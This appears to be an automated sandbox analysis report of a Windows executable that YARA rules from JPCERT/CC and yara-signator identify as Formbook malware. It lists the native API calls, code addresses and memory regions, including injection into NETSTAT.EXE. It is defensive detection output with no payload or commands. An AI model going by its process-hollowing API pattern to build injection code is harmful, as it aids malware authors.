          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419D60 NtCreateFile,2_2_00419D60
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419E10 NtReadFile,2_2_00419E10
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419E90 NtClose,2_2_00419E90
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419F40 NtAllocateVirtualMemory,2_2_00419F40
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419D5A NtCreateFile,2_2_00419D5A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419DB4 NtReadFile,2_2_00419DB4
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419E0A NtReadFile,2_2_00419E0A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB98F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00BB98F0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00BB9860
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9840 NtDelayExecution,LdrInitializeThunk,2_2_00BB9840
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB99A0 NtCreateSection,LdrInitializeThunk,2_2_00BB99A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00BB9910
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9A20 NtResumeThread,LdrInitializeThunk,2_2_00BB9A20
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00BB9A00
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9A50 NtCreateFile,LdrInitializeThunk,2_2_00BB9A50
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB95D0 NtClose,LdrInitializeThunk,2_2_00BB95D0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9540 NtReadFile,LdrInitializeThunk,2_2_00BB9540
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00BB96E0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00BB9660
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00BB97A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9780 NtMapViewOfSection,LdrInitializeThunk,2_2_00BB9780
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9710 NtQueryInformationToken,LdrInitializeThunk,2_2_00BB9710
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB98A0 NtWriteVirtualMemory,2_2_00BB98A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9820 NtEnumerateKey,2_2_00BB9820
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BBB040 NtSuspendThread,2_2_00BBB040
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB99D0 NtCreateProcessEx,2_2_00BB99D0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9950 NtQueueApcThread,2_2_00BB9950
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9A80 NtOpenDirectoryObject,2_2_00BB9A80
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9A10 NtQuerySection,2_2_00BB9A10
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BBA3B0 NtGetContextThread,2_2_00BBA3B0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9B00 NtSetValueKey,2_2_00BB9B00
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB95F0 NtQueryInformationFile,2_2_00BB95F0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BBAD30 NtSetContextThread,2_2_00BBAD30
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9520 NtWaitForSingleObject,2_2_00BB9520
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9560 NtWriteFile,2_2_00BB9560
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB96D0 NtCreateKey,2_2_00BB96D0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9610 NtEnumerateValueKey,2_2_00BB9610
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9670 NtQueryInformationProcess,2_2_00BB9670
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9650 NtQueryValueKey,2_2_00BB9650
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9FE0 NtCreateMutant,2_2_00BB9FE0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9730 NtQueryVirtualMemory,2_2_00BB9730
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BBA710 NtOpenProcessToken,2_2_00BBA710
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9770 NtSetInformationFile,2_2_00BB9770
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BBA770 NtOpenThread,2_2_00BBA770
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9760 NtOpenProcess,2_2_00BB9760
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_00419D60 NtCreateFile,2_1_00419D60
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_00419E10 NtReadFile,2_1_00419E10
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_00419E90 NtClose,2_1_00419E90
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_00419F40 NtAllocateVirtualMemory,2_1_00419F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9A50 NtCreateFile,LdrInitializeThunk,4_2_038A9A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A99A0 NtCreateSection,LdrInitializeThunk,4_2_038A99A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_038A9910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9840 NtDelayExecution,LdrInitializeThunk,4_2_038A9840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_038A9860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9780 NtMapViewOfSection,LdrInitializeThunk,4_2_038A9780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9FE0 NtCreateMutant,LdrInitializeThunk,4_2_038A9FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9710 NtQueryInformationToken,LdrInitializeThunk,4_2_038A9710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A96D0 NtCreateKey,LdrInitializeThunk,4_2_038A96D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_038A96E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9650 NtQueryValueKey,LdrInitializeThunk,4_2_038A9650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_038A9660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A95D0 NtClose,LdrInitializeThunk,4_2_038A95D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9540 NtReadFile,LdrInitializeThunk,4_2_038A9540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038AA3B0 NtGetContextThread,4_2_038AA3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9B00 NtSetValueKey,4_2_038A9B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9A80 NtOpenDirectoryObject,4_2_038A9A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9A00 NtProtectVirtualMemory,4_2_038A9A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9A10 NtQuerySection,4_2_038A9A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9A20 NtResumeThread,4_2_038A9A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A99D0 NtCreateProcessEx,4_2_038A99D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9950 NtQueueApcThread,4_2_038A9950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A98A0 NtWriteVirtualMemory,4_2_038A98A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A98F0 NtReadVirtualMemory,4_2_038A98F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9820 NtEnumerateKey,4_2_038A9820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038AB040 NtSuspendThread,4_2_038AB040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A97A0 NtUnmapViewOfSection,4_2_038A97A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038AA710 NtOpenProcessToken,4_2_038AA710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9730 NtQueryVirtualMemory,4_2_038A9730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9760 NtOpenProcess,4_2_038A9760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038AA770 NtOpenThread,4_2_038AA770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9770 NtSetInformationFile,4_2_038A9770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9610 NtEnumerateValueKey,4_2_038A9610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9670 NtQueryInformationProcess,4_2_038A9670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A95F0 NtQueryInformationFile,4_2_038A95F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9520 NtWaitForSingleObject,4_2_038A9520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038AAD30 NtSetContextThread,4_2_038AAD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9560 NtWriteFile,4_2_038A9560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69D60 NtCreateFile,4_2_00D69D60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69E90 NtClose,4_2_00D69E90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69E10 NtReadFile,4_2_00D69E10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69F40 NtAllocateVirtualMemory,4_2_00D69F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69DB4 NtReadFile,4_2_00D69DB4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69D5A NtCreateFile,4_2_00D69D5A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69E0A NtReadFile,4_2_00D69E0A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040314A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_004046A70_2_004046A7
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0040102E2_2_0040102E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00402D8D2_2_00402D8D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00409E402_2_00409E40
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041D6692_2_0041D669
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00409E3B2_2_00409E3B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041D7432_2_0041D743
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041CFA32_2_0041CFA3
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A02_2_00BA20A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8B0902_2_00B8B090
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C428EC2_2_00C428EC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C420A82_2_00C420A8
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C310022_2_00C31002
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4E8242_2_00C4E824
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B941202_2_00B94120
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7F9002_2_00B7F900
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C422AE2_2_00C422AE
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAEBB02_2_00BAEBB0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3DBD22_2_00C3DBD2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C303DA2_2_00C303DA
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C42B282_2_00C42B28
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3D4662_2_00C3D466
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8841F2_2_00B8841F
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C425DD2_2_00C425DD
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA25812_2_00BA2581
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8D5E02_2_00B8D5E0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C41D552_2_00C41D55
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B70D202_2_00B70D20
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C42D072_2_00C42D07
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C42EF72_2_00C42EF7
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B96E302_2_00B96E30
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3D6162_2_00C3D616
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4DFCE2_2_00C4DFCE
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C41FF12_2_00C41FF1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_0040102E2_1_0040102E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_004010302_1_00401030
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389EBB04_2_0389EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392DBD24_2_0392DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03932B284_2_03932B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039322AE4_2_039322AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386F9004_2_0386F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038841204_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B0904_2_0387B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A04_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039320A84_2_039320A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039328EC4_2_039328EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039210024_2_03921002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0393E8244_2_0393E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03931FF14_2_03931FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03932EF74_2_03932EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392D6164_2_0392D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03886E304_2_03886E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038925814_2_03892581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039325DD4_2_039325DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387D5E04_2_0387D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03932D074_2_03932D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03860D204_2_03860D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03931D554_2_03931D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387841F4_2_0387841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392D4664_2_0392D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D52D904_2_00D52D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D52D8D4_2_00D52D8D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D59E404_2_00D59E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D59E3B4_2_00D59E3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D52FB04_2_00D52FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6CFA34_2_00D6CFA3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6D7434_2_00D6D743
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0386B150 appears 35 times
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: String function: 00B7B150 appears 35 times
          Source: Y4U48592345670954.exe, 00000000.00000003.653543330.000000001F0BF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y4U48592345670954.exe
          Source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Y4U48592345670954.exe
          Source: Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y4U48592345670954.exe
          Source: Y4U48592345670954.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
